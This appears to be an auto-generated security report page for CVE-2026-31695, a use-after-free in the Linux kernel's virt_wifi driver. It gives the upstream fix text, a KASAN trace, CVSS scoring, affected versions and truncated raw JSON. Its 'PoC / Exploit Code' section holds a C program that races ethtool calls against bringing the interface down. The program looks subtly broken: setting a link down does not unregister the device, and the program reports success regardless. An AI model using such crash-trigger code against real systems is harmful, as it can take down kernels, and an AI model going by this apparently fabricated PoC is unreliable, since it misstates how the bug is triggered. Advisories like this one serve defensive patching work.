Security Vulnerability Report
CVE-2026-31695 CVSS 7.8 HIGH

CVE-2026-31695

Published: 2026-05-01 14:16:19
Last Modified: 2026-05-06 19:19:52
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

wifi: virt_wifi: remove SET_NETDEV_DEV to avoid use-after-free

Currently we execute `SET_NETDEV_DEV(dev, &priv->lowerdev->dev)` for the virt_wifi net devices. However, unregistering a virt_wifi device in netdev_run_todo() can happen together with the device referenced by SET_NETDEV_DEV().

It can result in use-after-free during the ethtool operations performed on a virt_wifi device that is currently being unregistered. Such a net device can have the `dev.parent` field pointing to the freed memory, but ethnl_ops_begin() calls `pm_runtime_get_sync(dev->dev.parent)`.

Let's remove SET_NETDEV_DEV for virt_wifi to avoid bugs like this:

 ==================================================================
 BUG: KASAN: slab-use-after-free in __pm_runtime_resume+0xe2/0xf0
 Read of size 2 at addr ffff88810cfc46f8 by task pm/606

 Call Trace:
 <TASK>
 dump_stack_lvl+0x4d/0x70
 print_report+0x170/0x4f3
 ? __pfx__raw_spin_lock_irqsave+0x10/0x10
 kasan_report+0xda/0x110
 ? __pm_runtime_resume+0xe2/0xf0
 ? __pm_runtime_resume+0xe2/0xf0
 __pm_runtime_resume+0xe2/0xf0
 ethnl_ops_begin+0x49/0x270
 ethnl_set_features+0x23c/0xab0
 ? __pfx_ethnl_set_features+0x10/0x10
 ? kvm_sched_clock_read+0x11/0x20
 ? local_clock_noinstr+0xf/0xf0
 ? local_clock+0x10/0x30
 ? kasan_save_track+0x25/0x60
 ? __kasan_kmalloc+0x7f/0x90
 ? genl_family_rcv_msg_attrs_parse.isra.0+0x150/0x2c0
 genl_family_rcv_msg_doit+0x1e7/0x2c0
 ? __pfx_genl_family_rcv_msg_doit+0x10/0x10
 ? __pfx_cred_has_capability.isra.0+0x10/0x10
 ? stack_trace_save+0x8e/0xc0
 genl_rcv_msg+0x411/0x660
 ? __pfx_genl_rcv_msg+0x10/0x10
 ? __pfx_ethnl_set_features+0x10/0x10
 netlink_rcv_skb+0x121/0x380
 ? __pfx_genl_rcv_msg+0x10/0x10
 ? __pfx_netlink_rcv_skb+0x10/0x10
 ? __pfx_down_read+0x10/0x10
 genl_rcv+0x23/0x30
 netlink_unicast+0x60f/0x830
 ? __pfx_netlink_unicast+0x10/0x10
 ? __pfx___alloc_skb+0x10/0x10
 netlink_sendmsg+0x6ea/0xbc0
 ? __pfx_netlink_sendmsg+0x10/0x10
 ? __futex_queue+0x10b/0x1f0
 ____sys_sendmsg+0x7a2/0x950
 ? copy_msghdr_from_user+0x26b/0x430
 ? __pfx_____sys_sendmsg+0x10/0x10
 ? __pfx_copy_msghdr_from_user+0x10/0x10
 ___sys_sendmsg+0xf8/0x180
 ? __pfx____sys_sendmsg+0x10/0x10
 ? __pfx_futex_wait+0x10/0x10
 ? fdget+0x2e4/0x4a0
 __sys_sendmsg+0x11f/0x1c0
 ? __pfx___sys_sendmsg+0x10/0x10
 do_syscall_64+0xe2/0x570
 ? exc_page_fault+0x66/0xb0
 entry_SYSCALL_64_after_hwframe+0x77/0x7f
 </TASK>

This fix may be combined with another one in the ethtool subsystem: https://lore.kernel.org/all/[email protected]/T/#u

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE (from 5.15, before 5.15.203)
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE (from 5.16, before 6.1.168)
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE (from 6.2, before 6.6.134)
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE (from 6.7, before 6.12.81)
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE (from 6.13, before 6.18.22)
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE (from 6.19, before 6.19.12)
Linux kernel 7.0 rc1 - VULNERABLE (CPE entry truncated in the raw JSON record)
Version ranges are taken from the cpeMatch entries in the raw JSON record below.
Linux Kernel (versions before the fix commit was applied)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```c
/*
 * PoC for CVE-2026-31695
 * This PoC attempts to trigger the race condition between
 * device unregistration and ethtool operations.
 * Compile: gcc -o poc_exploit poc_exploit.c -lpthread
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <pthread.h>
#include <sys/socket.h>
#include <linux/if.h>

void *ethtool_thread(void *arg)
{
    char *iface = (char *)arg;
    char cmd[100];

    // Continuously trigger ethtool operations to race with unregistration
    while (1) {
        snprintf(cmd, sizeof(cmd), "ethtool %s", iface);
        system(cmd);
        usleep(100); // Short delay to intensify race condition attempts
    }
    return NULL;
}

int main(void)
{
    pthread_t tid;
    // Assume the vulnerable virt_wifi interface is named 'wlan0'
    // This requires the system to have virt_wifi loaded and configured
    char *iface = "wlan0";

    printf("[+] Starting PoC for CVE-2026-31695 (UAF in virt_wifi)...\n");

    // Step 1: Start a thread to spam ethtool requests on the target interface
    // This targets the ethnl_ops_begin path accessing dev.parent
    pthread_create(&tid, NULL, ethtool_thread, iface);

    // Step 2: Wait briefly then trigger the device unregister path
    // In a real scenario, this might involve deleting the wifi interface or module
    sleep(1);
    printf("[+] Triggering device unregistration/race condition...\n");

    // Simulate the unregister action (e.g., bringing down the interface)
    // which triggers netdev_run_todo and frees the parent device
    char cmd[100];
    snprintf(cmd, sizeof(cmd), "ip link set %s down", iface);
    system(cmd);

    // If successful, the kernel should report a KASAN: slab-use-after-free error
    printf("[+] Exploit triggered. Check dmesg for KASAN errors.\n");
    sleep(2);
    return 0;
}
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-31695", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-01T14:16:19.250", "lastModified": "2026-05-06T19:19:51.540", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: virt_wifi: remove SET_NETDEV_DEV to avoid use-after-free\n\nCurrently we execute `SET_NETDEV_DEV(dev, &priv->lowerdev->dev)` for\nthe virt_wifi net devices. However, unregistering a virt_wifi device in\nnetdev_run_todo() can happen together with the device referenced by\nSET_NETDEV_DEV().\n\nIt can result in use-after-free during the ethtool operations performed\non a virt_wifi device that is currently being unregistered. Such a net\ndevice can have the `dev.parent` field pointing to the freed memory,\nbut ethnl_ops_begin() calls `pm_runtime_get_sync(dev->dev.parent)`.\n\nLet's remove SET_NETDEV_DEV for virt_wifi to avoid bugs like this:\n\n ==================================================================\n BUG: KASAN: slab-use-after-free in __pm_runtime_resume+0xe2/0xf0\n Read of size 2 at addr ffff88810cfc46f8 by task pm/606\n\n Call Trace:\n <TASK>\n dump_stack_lvl+0x4d/0x70\n print_report+0x170/0x4f3\n ? __pfx__raw_spin_lock_irqsave+0x10/0x10\n kasan_report+0xda/0x110\n ? __pm_runtime_resume+0xe2/0xf0\n ? __pm_runtime_resume+0xe2/0xf0\n __pm_runtime_resume+0xe2/0xf0\n ethnl_ops_begin+0x49/0x270\n ethnl_set_features+0x23c/0xab0\n ? __pfx_ethnl_set_features+0x10/0x10\n ? kvm_sched_clock_read+0x11/0x20\n ? local_clock_noinstr+0xf/0xf0\n ? local_clock+0x10/0x30\n ? kasan_save_track+0x25/0x60\n ? __kasan_kmalloc+0x7f/0x90\n ? genl_family_rcv_msg_attrs_parse.isra.0+0x150/0x2c0\n genl_family_rcv_msg_doit+0x1e7/0x2c0\n ? __pfx_genl_family_rcv_msg_doit+0x10/0x10\n ? __pfx_cred_has_capability.isra.0+0x10/0x10\n ? stack_trace_save+0x8e/0xc0\n genl_rcv_msg+0x411/0x660\n ? __pfx_genl_rcv_msg+0x10/0x10\n ? 
__pfx_ethnl_set_features+0x10/0x10\n netlink_rcv_skb+0x121/0x380\n ? __pfx_genl_rcv_msg+0x10/0x10\n ? __pfx_netlink_rcv_skb+0x10/0x10\n ? __pfx_down_read+0x10/0x10\n genl_rcv+0x23/0x30\n netlink_unicast+0x60f/0x830\n ? __pfx_netlink_unicast+0x10/0x10\n ? __pfx___alloc_skb+0x10/0x10\n netlink_sendmsg+0x6ea/0xbc0\n ? __pfx_netlink_sendmsg+0x10/0x10\n ? __futex_queue+0x10b/0x1f0\n ____sys_sendmsg+0x7a2/0x950\n ? copy_msghdr_from_user+0x26b/0x430\n ? __pfx_____sys_sendmsg+0x10/0x10\n ? __pfx_copy_msghdr_from_user+0x10/0x10\n ___sys_sendmsg+0xf8/0x180\n ? __pfx____sys_sendmsg+0x10/0x10\n ? __pfx_futex_wait+0x10/0x10\n ? fdget+0x2e4/0x4a0\n __sys_sendmsg+0x11f/0x1c0\n ? __pfx___sys_sendmsg+0x10/0x10\n do_syscall_64+0xe2/0x570\n ? exc_page_fault+0x66/0xb0\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n </TASK>\n\nThis fix may be combined with another one in the ethtool subsystem:\nhttps://lore.kernel.org/all/[email protected]/T/#u"}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.15", "versionEndExcluding": "5.15.203", "matchCriteriaId": "85C0DA29-FD98-4182-B0A1-624E28976709"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": 
"6.1.168", "matchCriteriaId": "E2DDDCA1-6DAB-4018-B920-8F045DDD8D3B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.134", "matchCriteriaId": "F56F925B-BAF8-4F4B-B62F-1496AF19A307"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.81", "matchCriteriaId": "6EF80433-B33B-43C5-8E64-0FA7B8DCE1BC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.22", "matchCriteriaId": "C9DF8BCE-36D3-475D-9D21-19E4F02F9029"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.12", "matchCriteriaId": "0A2B9540-02D5-41B4-B16A-82AF66FD4F36"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1 ... (truncated)